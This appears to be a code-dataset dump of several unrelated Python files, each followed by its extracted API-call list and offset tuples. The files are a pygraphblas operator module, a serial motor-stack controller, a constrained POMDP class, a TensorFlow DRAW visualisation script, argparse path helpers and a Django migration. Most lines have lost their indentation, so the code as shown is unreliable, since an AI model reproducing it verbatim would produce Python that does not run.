current_binop.reset(self.token)
return False
def __call__(self, A, B, *args, **kwargs):
return A.emult(B, self, *args, **kwargs)
def get_op(self):
return self.binaryop
def print(self, level=2, name="", f=sys.stdout): # pragma: nocover
"""Print the matrix using `GxB_Matrix_fprint()`, by default to
`sys.stdout`.
Level 1: Short description
Level 2: Short list, short numbers
Level 3: Long list, short number
Level 4: Short list, long numbers
Level 5: Long list, long numbers
"""
_check(lib.GxB_BinaryOp_fprint(self.binaryop, bytes(name, "utf8"), level, f))
class Accum:
"""Helper context manager to specify accumulator binary operator in
overloaded operator contexts like `@`. This disambiguates for
methods like `Matrix.eadd` and `Matrix.emult` that can specify
both a binary operators *and* a binary accumulator.
See those methods and `Matrix.mxm` for examples.
"""
__slots__ = ("binaryop", "token")
def __init__(self, binaryop):
self.binaryop = binaryop
def __enter__(self):
self.token = current_accum.set(self.binaryop)
return self
def __exit__(self, *errors):
current_accum.reset(self.token)
return False
grb_binop_re = re.compile(
"^(GrB|GxB)_(FIRST|SECOND|MIN|MAX|PLUS|MINUS|RMINUS|TIMES|DIV|RDIV|"
"FIRSTI|FIRSTI1|FIRSTJ|FIRSTJ1|SECONDI|SECONDI1|SECONDJ|SECONDJ1|"
"PAIR|ANY|POW|EQ|NE|GT|LT|GE|LE|LOR|LAND|LXOR|BOR|BAND|BXOR|BXNOR|"
"ATAN2|HYPOT|FMOD|REMAINDER|LDEXP|COPYSIGN|BGET|BSET|BCLR|BSHIFT|CMPLX)_"
"(BOOL|UINT8|UINT16|UINT32|UINT64|INT8|INT16|INT32|INT64|FP32|FP64|FC32|FC64)$"
)
pure_bool_re = re.compile("^(GrB|GxB)_(LOR|LAND|LXOR)_(BOOL)$")
def binop_group(reg):
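    # Wrap every GraphBLAS built-in whose name matches reg in a BinaryOp and
    # register it on the matching type class.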
srs = []
for n in filter(None, [reg.match(i) for i in dir(lib)]):
prefix, op, typ = n.groups()
srs.append(BinaryOp(op, typ, getattr(lib, n.string)))
return srs
def build_binaryops(__pdoc__):
import tempfile
this = sys.modules[__name__]
for r in chain(binop_group(grb_binop_re), binop_group(pure_bool_re)):
setattr(this, r.name, r)
this.__all__.append(r.name)
op, typ = r.name.split("_")
f = tempfile.TemporaryFile()
r.print(f=f)
f.seek(0)
__pdoc__[f"{typ}.{op}"] = f"""```{str(f.read(), 'utf8')}```"""
def binary_op(arg_type, nopython=True):
"""Decorator to jit-compile Python function into a GrB_BinaryOp
object.
>>> from random import uniform
>>> from pygraphblas import Matrix, binary_op, types, gviz
>>> @binary_op(types.FP64)
... def uniform(x, y):
... return uniform(x, y)
>>> A = Matrix.dense(types.FP64, 3, 3, fill=0)
>>> B = A.dup()
>>> with uniform:
... A += 1
Calling `A += 1` with the `uniform` binary operator is the same as
calling `apply_second` with an `out` parameter:
>>> B.apply_second(uniform, 1, out=B) is B
True
>>> ga = gviz.draw_matrix(A, scale=40,
... filename='docs/imgs/binary_op_A')
>>> gb = gviz.draw_matrix(B, scale=40,
... filename='docs/imgs/binary_op_B')
 
"""
def inner(func):
func_name = func.__name__
sig = numba.void(
numba.types.CPointer(arg_type._numba_t),
numba.types.CPointer(arg_type._numba_t),
numba.types.CPointer(arg_type._numba_t),
)
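        # C-level signature: void(T *z, T *x, T *y); GraphBLAS passes pointers
        # to the output and to both inputs.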
jitfunc = numba.jit(func, nopython=nopython)
@numba.cfunc(sig, nopython=True)
def wrapper(z, x, y): # pragma: no cover
result = jitfunc(x[0], y[0])
z[0] = result
out = ffi.new("GrB_BinaryOp*")
lib.GrB_BinaryOp_new(
out,
ffi.cast("GxB_binary_function", wrapper.address),
arg_type._gb_type,
arg_type._gb_type,
arg_type._gb_type,
)
return BinaryOp(func_name, arg_type.__name__, out[0])
return inner
|
[
"numba.types.CPointer",
"tempfile.TemporaryFile",
"numba.jit",
"contextvars.ContextVar",
"numba.cfunc",
"re.compile"
] |
[((390, 429), 'contextvars.ContextVar', 'contextvars.ContextVar', (['"""current_accum"""'], {}), "('current_accum')\n", (412, 429), False, 'import contextvars\n'), ((446, 485), 'contextvars.ContextVar', 'contextvars.ContextVar', (['"""current_binop"""'], {}), "('current_binop')\n", (468, 485), False, 'import contextvars\n'), ((2738, 3105), 're.compile', 're.compile', (['"""^(GrB|GxB)_(FIRST|SECOND|MIN|MAX|PLUS|MINUS|RMINUS|TIMES|DIV|RDIV|FIRSTI|FIRSTI1|FIRSTJ|FIRSTJ1|SECONDI|SECONDI1|SECONDJ|SECONDJ1|PAIR|ANY|POW|EQ|NE|GT|LT|GE|LE|LOR|LAND|LXOR|BOR|BAND|BXOR|BXNOR|ATAN2|HYPOT|FMOD|REMAINDER|LDEXP|COPYSIGN|BGET|BSET|BCLR|BSHIFT|CMPLX)_(BOOL|UINT8|UINT16|UINT32|UINT64|INT8|INT16|INT32|INT64|FP32|FP64|FC32|FC64)$"""'], {}), "(\n '^(GrB|GxB)_(FIRST|SECOND|MIN|MAX|PLUS|MINUS|RMINUS|TIMES|DIV|RDIV|FIRSTI|FIRSTI1|FIRSTJ|FIRSTJ1|SECONDI|SECONDI1|SECONDJ|SECONDJ1|PAIR|ANY|POW|EQ|NE|GT|LT|GE|LE|LOR|LAND|LXOR|BOR|BAND|BXOR|BXNOR|ATAN2|HYPOT|FMOD|REMAINDER|LDEXP|COPYSIGN|BGET|BSET|BCLR|BSHIFT|CMPLX)_(BOOL|UINT8|UINT16|UINT32|UINT64|INT8|INT16|INT32|INT64|FP32|FP64|FC32|FC64)$'\n )\n", (2748, 3105), False, 'import re\n'), ((3146, 3194), 're.compile', 're.compile', (['"""^(GrB|GxB)_(LOR|LAND|LXOR)_(BOOL)$"""'], {}), "('^(GrB|GxB)_(LOR|LAND|LXOR)_(BOOL)$')\n", (3156, 3194), False, 'import re\n'), ((3685, 3709), 'tempfile.TemporaryFile', 'tempfile.TemporaryFile', ([], {}), '()\n', (3707, 3709), False, 'import tempfile\n'), ((4975, 5009), 'numba.jit', 'numba.jit', (['func'], {'nopython': 'nopython'}), '(func, nopython=nopython)\n', (4984, 5009), False, 'import numba\n'), ((5020, 5051), 'numba.cfunc', 'numba.cfunc', (['sig'], {'nopython': '(True)'}), '(sig, nopython=True)\n', (5031, 5051), False, 'import numba\n'), ((4800, 4839), 'numba.types.CPointer', 'numba.types.CPointer', (['arg_type._numba_t'], {}), '(arg_type._numba_t)\n', (4820, 4839), False, 'import numba\n'), ((4853, 4892), 'numba.types.CPointer', 'numba.types.CPointer', (['arg_type._numba_t'], {}), '(arg_type._numba_t)\n', (4873, 4892), False, 'import numba\n'), ((4906, 4945), 'numba.types.CPointer', 'numba.types.CPointer', (['arg_type._numba_t'], {}), '(arg_type._numba_t)\n', (4926, 4945), False, 'import numba\n')]
|
import serial
from time import sleep, localtime, strftime, time
from smc100py3 import SMC100CC
"""
Controller class for stack of SMC100CC drivers.
It makes easier to handle multiple controllers.
Requires smc100py3.py module.
Example:
ConstructionDict = {
1 : (1, None, 0),
2 : (2, None, 0),
3 : (3, "My motor", 0)
}
Ms = SMCStack('COM3', ConstructionDict, 1) #init stack
Mov1 = {1: 20, 2:30} #define movement
Ms(Mov1) #perform collective movement
#...
Ms.Close() #close port at the end
"""
class SMCStack():
dT = 0.02
DEBUG = False
def __init__(self, port, ConstructionDict, MasterKey=None):
"""
Args:
port - string path to used serial port
ConstructionDict - dictionary with keys, addresses, labels and correction
MasterKey - selected key to be the constructed first, if none, first from keys is selected
"""
self.Motors = {}
        if MasterKey not in ConstructionDict:
MasterKey = sorted(ConstructionDict.keys())[0]
# Init first motor
self.Motors[MasterKey] = SMC100CC(port, *ConstructionDict[MasterKey])
self.Motors[MasterKey].DEBUG = self.DEBUG
self.port = self.Motors[MasterKey].port
sleep(self.dT)
# Init remaining motors
for key in sorted([key for key in ConstructionDict if key != MasterKey]):
addr, label, corr = ConstructionDict[key]
self.Motors[key] = SMC100CC(self.port, addr, label, corr)
self.Motors[key].DEBUG = self.DEBUG
def __call__(self, PosDict):
"""
        Delegate to CollectiveMove().
"""
self.CollectiveMove(PosDict)
def __del__(self):
self.port.close()
def __getitem__(self, key):
return self.Motors.get(key, None)
    def GetPos(self, keys=None):
        Position = {}
        if keys is None:
            keys = sorted(self.Motors.keys())
        for key in keys:
            if key in self.Motors:
                Position[key] = self.Motors[key].get_pos()
                sleep(self.dT)
return Position
def Home(self, keys=None):
"""
Untested collective home.
"""
        if keys is None:
            keys = self.Motors.keys()
        for key in keys:
            if key in self.Motors:
                self.Motors[key].home()
def WaitForMovement(self, keys):
"""
Wait for selected motor to finish movement.
Args:
keys: list with keys to selected motor
"""
is_moving = []
t0 = time()
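        # SMC100 controller state "28" means MOVING; poll each axis until none
        # report it, with a 100 s safety timeout.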
for key in keys:
sleep(self.dT)
val = self.Motors[key].get_state()[0] == "28"
is_moving.append(val)
while any(is_moving) and time()-t0 < 100:
sleep(self.dT)
is_moving = []
for key in keys:
val = self.Motors[key].get_state()[0] == "28"
sleep(self.dT)
is_moving.append(val)
def CollectiveMove(self, PosDict):
"""
        Efficient absolute move of multiple motors.
        Waits only for the motor travelling the farthest,
        and starts with the one covering the longest distance.
Args:
PosDict: dictionary of key: absolute position (deg)
"""
Current = self.GetPos()
target_keys = set(PosDict.keys())
my_keys = set(self.Motors.keys())
keys = target_keys.intersection(my_keys)
distance = {key: abs(Current[key]-PosDict[key]) for key in keys}
# sorted distance keys
distance = sorted(distance, key=lambda x: distance[x])
longest_dist = distance[-1] # key of longest-travelling motor
dist_value = abs(Current[longest_dist] - PosDict[longest_dist])
time_estim = self.Motors[longest_dist].get_mr_time(dist_value)
sleep(self.dT)
t0 = time()
for key in distance[::-1]:
self.Motors[key](PosDict[key])
sleep(self.dT)
while time()-t0 < time_estim and time()-t0 < 100: # upper limit for waiting
sleep(2*self.dT)
self.WaitForMovement(distance)
def Close(self):
self.port.close()
|
[
"smc100py3.SMC100CC",
"time.time",
"time.sleep"
] |
[((1181, 1225), 'smc100py3.SMC100CC', 'SMC100CC', (['port', '*ConstructionDict[MasterKey]'], {}), '(port, *ConstructionDict[MasterKey])\n', (1189, 1225), False, 'from smc100py3 import SMC100CC\n'), ((1335, 1349), 'time.sleep', 'sleep', (['self.dT'], {}), '(self.dT)\n', (1340, 1349), False, 'from time import sleep, localtime, strftime, time\n'), ((2727, 2733), 'time.time', 'time', ([], {}), '()\n', (2731, 2733), False, 'from time import sleep, localtime, strftime, time\n'), ((4033, 4047), 'time.sleep', 'sleep', (['self.dT'], {}), '(self.dT)\n', (4038, 4047), False, 'from time import sleep, localtime, strftime, time\n'), ((4064, 4070), 'time.time', 'time', ([], {}), '()\n', (4068, 4070), False, 'from time import sleep, localtime, strftime, time\n'), ((1555, 1593), 'smc100py3.SMC100CC', 'SMC100CC', (['self.port', 'addr', 'label', 'corr'], {}), '(self.port, addr, label, corr)\n', (1563, 1593), False, 'from smc100py3 import SMC100CC\n'), ((2773, 2787), 'time.sleep', 'sleep', (['self.dT'], {}), '(self.dT)\n', (2778, 2787), False, 'from time import sleep, localtime, strftime, time\n'), ((2948, 2962), 'time.sleep', 'sleep', (['self.dT'], {}), '(self.dT)\n', (2953, 2962), False, 'from time import sleep, localtime, strftime, time\n'), ((4164, 4178), 'time.sleep', 'sleep', (['self.dT'], {}), '(self.dT)\n', (4169, 4178), False, 'from time import sleep, localtime, strftime, time\n'), ((4280, 4298), 'time.sleep', 'sleep', (['(2 * self.dT)'], {}), '(2 * self.dT)\n', (4285, 4298), False, 'from time import sleep, localtime, strftime, time\n'), ((2189, 2203), 'time.sleep', 'sleep', (['self.dT'], {}), '(self.dT)\n', (2194, 2203), False, 'from time import sleep, localtime, strftime, time\n'), ((3101, 3115), 'time.sleep', 'sleep', (['self.dT'], {}), '(self.dT)\n', (3106, 3115), False, 'from time import sleep, localtime, strftime, time\n'), ((2918, 2924), 'time.time', 'time', ([], {}), '()\n', (2922, 2924), False, 'from time import sleep, localtime, strftime, time\n'), ((4196, 4202), 'time.time', 'time', ([], {}), '()\n', (4200, 4202), False, 'from time import sleep, localtime, strftime, time\n'), ((4223, 4229), 'time.time', 'time', ([], {}), '()\n', (4227, 4229), False, 'from time import sleep, localtime, strftime, time\n')]
|
#################################################################################
# ConstrainedPlanningToolbox
# Copyright (C) 2019 Algorithmics group, Delft University of Technology
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#################################################################################
from model.BeliefPoint import BeliefPoint
class CPOMDP:
def __init__(self, num_states, num_actions, num_observations, initial_belief, num_decisions):
self.num_states = num_states
self.num_actions = num_actions
self.num_observations = num_observations
self.num_decisions = num_decisions
self.rewards_defined = False
self.has_time_dependent_reward = False
self.reward_function = None
self.time_reward_function = None
self.transitions_defined = False
self.has_time_dependent_transitions = False
self.transition_destinations = None
self.transition_probabilities = None
self.time_transition_destinations = None
self.time_transition_probabilities = None
self.cost_function_defined = False
self.cost_function = None
self.feasible_actions = None
self.init_default_feasible_actions()
self.observation_function = None
self.initial_belief = initial_belief
self.initial_state = 0
def set_reward_function(self, reward_function):
self.rewards_defined = True
self.has_time_dependent_reward = False
self.reward_function = reward_function
self.time_reward_function = None
def set_time_reward_function(self, time_reward_function):
self.rewards_defined = True
self.has_time_dependent_reward = True
self.reward_function = None
self.time_reward_function = time_reward_function
def get_reward(self, s, a):
assert not self.has_time_dependent_reward
return self.reward_function[s][a]
def get_time_reward(self, t, s, a):
if self.has_time_dependent_reward:
return self.time_reward_function[t][s][a]
else:
return self.reward_function[s][a]
def set_transitions(self, destinations, probabilities):
self.transitions_defined = True
self.has_time_dependent_transitions = False
self.transition_destinations = destinations
self.transition_probabilities = probabilities
def set_time_transitions(self, destinations, probabilities):
self.transitions_defined = True
self.has_time_dependent_transitions = True
self.time_transition_destinations = destinations
self.time_transition_probabilities = probabilities
def get_transition_destinations(self, s, a):
assert not self.has_time_dependent_transitions
return self.transition_destinations[s][a]
def get_transition_probabilities(self, s, a):
assert not self.has_time_dependent_transitions
return self.transition_probabilities[s][a]
def get_time_transition_destinations(self, t, s, a):
if self.has_time_dependent_transitions:
return self.time_transition_destinations[t][s][a]
else:
return self.transition_destinations[s][a]
def get_time_transition_probabilities(self, t, s, a):
if self.has_time_dependent_transitions:
return self.time_transition_probabilities[t][s][a]
else:
return self.transition_probabilities[s][a]
def init_default_feasible_actions(self):
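        # By default every action is feasible in every (decision epoch, state) pair.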
self.feasible_actions = [[[] for s in range(self.num_states)] for t in range(self.num_decisions)]
for t in range(self.num_decisions):
for s in range(self.num_states):
for a in range(self.num_actions):
self.feasible_actions[t][s].append(a)
def get_feasible_actions(self, t, s):
return self.feasible_actions[t][s]
def set_feasible_actions(self, feasible_actions):
self.feasible_actions = feasible_actions
def get_cost(self, k, s, a):
assert self.cost_function_defined
return self.cost_function[k][s][a]
def get_num_domain_resources(self):
assert self.cost_function_defined
return len(self.cost_function)
def set_cost_functions(self, cost_function):
self.cost_function_defined = True
self.cost_function = cost_function
def set_observation_function(self, observation_function):
self.observation_function = observation_function
def get_observation_probability(self, a, s_next, o):
return self.observation_function[a][s_next][o]
def prepare_belief(self, belief_point):
if belief_point.has_action_observation_probs():
return
ao_probs = [[0.0 for o in range(self.num_observations)] for a in range(self.num_actions)]
for a in range(self.num_actions):
for o in range(self.num_observations):
prob = 0.0
for s in range(self.num_states):
destinations = self.get_transition_destinations(s, a)
probabilities = self.get_transition_probabilities(s, a)
for i in range(len(destinations)):
s_next = destinations[i]
s_next_prob = probabilities[i]
prob += self.get_observation_probability(a, s_next, o) * s_next_prob * belief_point.belief[s]
ao_probs[a][o] = prob
belief_point.set_action_observation_probabilities(ao_probs)
def update_belief(self, belief_point, a, o):
new_belief = [0.0 for s in range(self.num_states)]
if not belief_point.has_action_observation_probs():
self.prepare_belief(belief_point)
nc = belief_point.get_action_observation_probability(a, o)
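        # nc is the normalization constant Pr(o | b, a); dividing by it
        # renormalizes the updated belief.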
for s in range(self.num_states):
destinations = self.get_transition_destinations(s, a)
probabilities = self.get_transition_probabilities(s, a)
for i in range(len(destinations)):
s_next = destinations[i]
s_next_prob = probabilities[i]
new_belief[s_next] += self.get_observation_probability(a, s_next, o) * s_next_prob * (1.0 / nc) * belief_point.belief[s]
return BeliefPoint(new_belief)
|
[
"model.BeliefPoint.BeliefPoint"
] |
[((6870, 6893), 'model.BeliefPoint.BeliefPoint', 'BeliefPoint', (['new_belief'], {}), '(new_belief)\n', (6881, 6893), False, 'from model.BeliefPoint import BeliefPoint\n')]
|
import warnings
warnings.filterwarnings('ignore')
import tensorflow as tf
from tensorflow.examples.tutorials import mnist
import numpy as np
import os
import random
from scipy import misc
import time
import sys
#from draw import viz_data, x, A, B, read_n, T
#from drawCopy1 import viz_data, x, A, B, read_n, T
#from draw_eric import viz_data, x, A, B, read_n, T
from draw_eric_rewrite_filterbank import viz_data, x, A, B, read_n, T
#import load_input
#import load_trace
sess_config = tf.ConfigProto()
sess_config.gpu_options.allow_growth = True
sess = tf.InteractiveSession(config=sess_config)
saver = tf.train.Saver()
#data = load_trace.TraceData()
#data.get_test(1)
#data = load_input.InputData()
#data.get_test(1)
data = mnist.input_data.read_data_sets("mnist", one_hot=True).test
def random_image():
"""Get a random image from test set."""
num_images = len(data.images)
i = random.randrange(num_images)
image_ar = np.array(data.images[i]).reshape(A, B)
return image_ar#, data.labels[i]
def load_checkpoint(it):
#path = "model_runs/blob_classification"
#saver.restore(sess, "%s/drawmodel_%d.ckpt" % (path, it))
#saver.restore(sess, "trace_draw/drawmodel.ckpt")
saver.restore(sess, "model_runs/rewrite_filterbank/drawmodel.ckpt")
# saver.restore(sess, "model_runs/rewrite_filterbank/drawmodel.ckpt")
last_image = None
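# module-level cache of the most recently sampled test image, reused when new_image is False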
def read_img(it, new_image):
batch_size = 1
out = dict()
global last_image
if new_image or last_image is None:
last_image = random_image()
#img, label = last_image
img = last_image
flipped = np.flip(img.reshape(A, B), 0)
out = {
"img": flipped,
#"label": label,
"rects": list(),
"rs": list(),
}
load_checkpoint(it)
cs = sess.run(viz_data, feed_dict={x: img.reshape(batch_size, A*B)})
for i in range(len(cs)):
print('cs[i]["stats"]: ', cs[i]["stats"])
#print(len(cs[i]["r"]))
out["rs"].append(np.flip(cs[i]["r"].reshape(read_n, read_n), 0))
out["rects"].append(stats_to_rect(cs[i]["stats"]))
return out
def read_img2(it, new_image):
"""Read image with rewritten filterbanks."""
batch_size = 1
out = dict()
global last_image
if new_image or last_image is None:
last_image = random_image()
img = last_image
flipped = np.flip(img.reshape(A, B), 0)
out = {
"img": flipped,
"dots": list(),
}
load_checkpoint(it)
cs = sess.run(viz_data, feed_dict={x: img.reshape(batch_size, A*B)})
for i in range(len(cs)):
mu_x = list(cs[i]["r_mu_x"])
mu_y = list(cs[i]["r_mu_y"])
delta = list(cs[i]["r_delta"])
gx_ = cs[i]["r_gx_"]
gy_ = cs[i]["r_gy_"]
# sigma2 = list(cs[i]["r_sigma2"])
# print("glimpse: ", i)
#
print("gx_: ")
print(gx_)
print("gy_: ")
print(gy_)
# print("sigma2: ")
# print(sigma2)
#
print("delta: ")
print(delta)
print("")
out["dots"].append(list_to_dots(mu_x, mu_y))
return out
def write_img(it, new_image):
batch_size = 1
out = dict()
global last_image
if new_image or last_image is None:
last_image = random_image()
#img, label = last_image
img = last_image
flipped = np.flip(img.reshape(A, B), 0)
out = {
#"label": label,
"rects": list(),
"c": list(),
}
load_checkpoint(it)
cs = sess.run(viz_data, feed_dict={x: img.reshape(batch_size, A*B)})
for i in range(len(cs)):
out["c"].append(np.flip(cs[i]["c"].reshape(A, B), 0))
out["rects"].append(stats_to_rect(cs[i]["w_stats"]))
#print('cs[i]["stats"]: ')
#print(cs[i]["stats"])
#print('stats_to_rect[i]["stats"]: ')
#print(stats_to_rect(cs[i]["stats"]))
return out
def write_img2(it, new_image):
"""Write image with rewritten filterbanks."""
batch_size = 1
out = dict()
global last_image
if new_image or last_image is None:
last_image = random_image()
img = last_image
flipped = np.flip(img.reshape(A, B), 0)
out = {
"img": flipped,
"dots": list(),
"c": list(),
}
load_checkpoint(it)
cs = sess.run(viz_data, feed_dict={x: img.reshape(batch_size, A*B)})
for i in range(len(cs)):
out["c"].append(np.flip(cs[i]["c"].reshape(A, B), 0))
mu_x = list(cs[i]["w_mu_x"])
mu_y = list(cs[i]["w_mu_y"])
# delta = list(cs[i]["w_delta"])
out["dots"].append(list_to_dots(mu_x, mu_y))
# gx_ = cs[i]["w_gx_"]
# gy_ = cs[i]["w_gy_"]
# sigma2 = list(cs[i]["w_sigma2"])
#
# print("glimpse: ", i)
#
# print("gx_: ")
# print(gx_)
#
# print("gy_: ")
# print(gy_)
#
# print("sigma2: ")
# print(sigma2)
#
# print("delta: ")
# print(delta)
# print("")
return out
def stats_to_rect(stats):
"""Draw attention window based on gx, gy, and delta."""
gx, gy, delta = stats
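    # Map the attention grid centre (gx, gy) and stride delta to the window
    # corners, then clamp them to the image bounds.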
minY = A - gy + read_n/2.0 * delta
maxY = B - gy - read_n/2.0 * delta
minX = gx - read_n/2.0 * delta
maxX = gx + read_n/2.0 * delta
if minX < 1:
minX = 1
if maxY < 1:
maxY = 1
if maxX > A - 1:
maxX = A - 1
if minY > B - 1:
minY = B - 1
return dict(top=[int(minY)], bottom=[int(maxY)], left=[int(minX)], right=[int(maxX)])
def list_to_dots(mu_x, mu_y):
"""Draw filterbank based on mu_x and mu_y."""
mu_x_list = mu_x * read_n
mu_y_list = [val for val in mu_y for _ in range(0, read_n)]
return dict(mu_x_list=mu_x_list, mu_y_list=mu_y_list)
|
[
"tensorflow.train.Saver",
"warnings.filterwarnings",
"tensorflow.examples.tutorials.mnist.input_data.read_data_sets",
"tensorflow.ConfigProto",
"random.randrange",
"numpy.array",
"tensorflow.InteractiveSession"
] |
[((16, 49), 'warnings.filterwarnings', 'warnings.filterwarnings', (['"""ignore"""'], {}), "('ignore')\n", (39, 49), False, 'import warnings\n'), ((486, 502), 'tensorflow.ConfigProto', 'tf.ConfigProto', ([], {}), '()\n', (500, 502), True, 'import tensorflow as tf\n'), ((554, 595), 'tensorflow.InteractiveSession', 'tf.InteractiveSession', ([], {'config': 'sess_config'}), '(config=sess_config)\n', (575, 595), True, 'import tensorflow as tf\n'), ((605, 621), 'tensorflow.train.Saver', 'tf.train.Saver', ([], {}), '()\n', (619, 621), True, 'import tensorflow as tf\n'), ((730, 784), 'tensorflow.examples.tutorials.mnist.input_data.read_data_sets', 'mnist.input_data.read_data_sets', (['"""mnist"""'], {'one_hot': '(True)'}), "('mnist', one_hot=True)\n", (761, 784), False, 'from tensorflow.examples.tutorials import mnist\n'), ((898, 926), 'random.randrange', 'random.randrange', (['num_images'], {}), '(num_images)\n', (914, 926), False, 'import random\n'), ((942, 966), 'numpy.array', 'np.array', (['data.images[i]'], {}), '(data.images[i])\n', (950, 966), True, 'import numpy as np\n')]
|
import argparse
from pathlib import Path
from typing import Any, Optional, Sequence, Union
class FullDirPath(argparse.Action):
"""
argparse.Action subclass to resolve a path and make sure it's a directory
"""
def __call__(
self,
        parser: argparse.ArgumentParser,
namespace: argparse.Namespace,
values: Union[str, Sequence[Any], None],
option_string: Optional[str] = None,
) -> None:
"""
Resolve the input path and make sure it doesn't exist (so we can make it
later), or that it's a directory.
"""
full_path = Path(str(values)).resolve()
if full_path.exists() and not full_path.is_dir():
raise argparse.ArgumentTypeError(f"{self.dest} must be a directory")
setattr(namespace, self.dest, full_path)
class FullPath(argparse.Action):
"""
argparse.Action subclass to resolve a path
"""
def __call__(
self,
        parser: argparse.ArgumentParser,
namespace: argparse.Namespace,
values: Union[str, Sequence[Any], None],
option_string: Optional[str] = None,
) -> None:
"""
Resolve the input path
"""
full_path = Path(str(values)).resolve()
setattr(namespace, self.dest, full_path)
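# Hypothetical usage sketch (argument names are illustrative only):
#   parser = argparse.ArgumentParser()
#   parser.add_argument("--output-dir", action=FullDirPath)
#   parser.add_argument("--input-file", action=FullPath)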
|
[
"argparse.ArgumentTypeError"
] |
[((715, 777), 'argparse.ArgumentTypeError', 'argparse.ArgumentTypeError', (['f"""{self.dest} must be a directory"""'], {}), "(f'{self.dest} must be a directory')\n", (741, 777), False, 'import argparse\n')]
|
# Generated by Django 2.0.1 on 2018-03-22 20:14
from django.db import migrations, models
import django.utils.timezone
import model_utils.fields
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Configuration',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created', model_utils.fields.AutoCreatedField(default=django.utils.timezone.now, editable=False, verbose_name='created')),
('modified', model_utils.fields.AutoLastModifiedField(default=django.utils.timezone.now, editable=False, verbose_name='modified')),
('company_logo', models.ImageField(blank=True, help_text='size should be 250pt x 100pt', null=True, upload_to='config/configuration/', verbose_name='Logo')),
('company_legal_name', models.CharField(blank=True, max_length=255, null=True, verbose_name='Legal name')),
('company_email', models.EmailField(blank=True, max_length=255, null=True, verbose_name='Email')),
('company_phone', models.CharField(blank=True, max_length=20, null=True, verbose_name='Phone')),
('company_tax_identifier', models.CharField(blank=True, max_length=20, null=True, verbose_name='Tax identifier')),
('company_address', models.CharField(blank=True, max_length=255, null=True, verbose_name='Address')),
('company_state', models.CharField(blank=True, max_length=100, null=True, verbose_name='State')),
('company_city', models.CharField(blank=True, max_length=100, null=True, verbose_name='City')),
('company_country', models.CharField(blank=True, max_length=100, null=True, verbose_name='Country')),
('company_zipcode', models.CharField(blank=True, max_length=10, null=True, verbose_name='Zipcode')),
],
options={
'abstract': False,
},
),
]
|
[
"django.db.models.ImageField",
"django.db.models.EmailField",
"django.db.models.CharField",
"django.db.models.AutoField"
] |
[((364, 457), 'django.db.models.AutoField', 'models.AutoField', ([], {'auto_created': '(True)', 'primary_key': '(True)', 'serialize': '(False)', 'verbose_name': '"""ID"""'}), "(auto_created=True, primary_key=True, serialize=False,\n verbose_name='ID')\n", (380, 457), False, 'from django.db import migrations, models\n'), ((778, 920), 'django.db.models.ImageField', 'models.ImageField', ([], {'blank': '(True)', 'help_text': '"""size should be 250pt x 100pt"""', 'null': '(True)', 'upload_to': '"""config/configuration/"""', 'verbose_name': '"""Logo"""'}), "(blank=True, help_text='size should be 250pt x 100pt',\n null=True, upload_to='config/configuration/', verbose_name='Logo')\n", (795, 920), False, 'from django.db import migrations, models\n'), ((958, 1045), 'django.db.models.CharField', 'models.CharField', ([], {'blank': '(True)', 'max_length': '(255)', 'null': '(True)', 'verbose_name': '"""Legal name"""'}), "(blank=True, max_length=255, null=True, verbose_name=\n 'Legal name')\n", (974, 1045), False, 'from django.db import migrations, models\n'), ((1077, 1155), 'django.db.models.EmailField', 'models.EmailField', ([], {'blank': '(True)', 'max_length': '(255)', 'null': '(True)', 'verbose_name': '"""Email"""'}), "(blank=True, max_length=255, null=True, verbose_name='Email')\n", (1094, 1155), False, 'from django.db import migrations, models\n'), ((1192, 1268), 'django.db.models.CharField', 'models.CharField', ([], {'blank': '(True)', 'max_length': '(20)', 'null': '(True)', 'verbose_name': '"""Phone"""'}), "(blank=True, max_length=20, null=True, verbose_name='Phone')\n", (1208, 1268), False, 'from django.db import migrations, models\n'), ((1314, 1404), 'django.db.models.CharField', 'models.CharField', ([], {'blank': '(True)', 'max_length': '(20)', 'null': '(True)', 'verbose_name': '"""Tax identifier"""'}), "(blank=True, max_length=20, null=True, verbose_name=\n 'Tax identifier')\n", (1330, 1404), False, 'from django.db import migrations, models\n'), ((1438, 1517), 'django.db.models.CharField', 'models.CharField', ([], {'blank': '(True)', 'max_length': '(255)', 'null': '(True)', 'verbose_name': '"""Address"""'}), "(blank=True, max_length=255, null=True, verbose_name='Address')\n", (1454, 1517), False, 'from django.db import migrations, models\n'), ((1554, 1631), 'django.db.models.CharField', 'models.CharField', ([], {'blank': '(True)', 'max_length': '(100)', 'null': '(True)', 'verbose_name': '"""State"""'}), "(blank=True, max_length=100, null=True, verbose_name='State')\n", (1570, 1631), False, 'from django.db import migrations, models\n'), ((1667, 1743), 'django.db.models.CharField', 'models.CharField', ([], {'blank': '(True)', 'max_length': '(100)', 'null': '(True)', 'verbose_name': '"""City"""'}), "(blank=True, max_length=100, null=True, verbose_name='City')\n", (1683, 1743), False, 'from django.db import migrations, models\n'), ((1782, 1861), 'django.db.models.CharField', 'models.CharField', ([], {'blank': '(True)', 'max_length': '(100)', 'null': '(True)', 'verbose_name': '"""Country"""'}), "(blank=True, max_length=100, null=True, verbose_name='Country')\n", (1798, 1861), False, 'from django.db import migrations, models\n'), ((1900, 1978), 'django.db.models.CharField', 'models.CharField', ([], {'blank': '(True)', 'max_length': '(10)', 'null': '(True)', 'verbose_name': '"""Zipcode"""'}), "(blank=True, max_length=10, null=True, verbose_name='Zipcode')\n", (1916, 1978), False, 'from django.db import migrations, models\n')]
|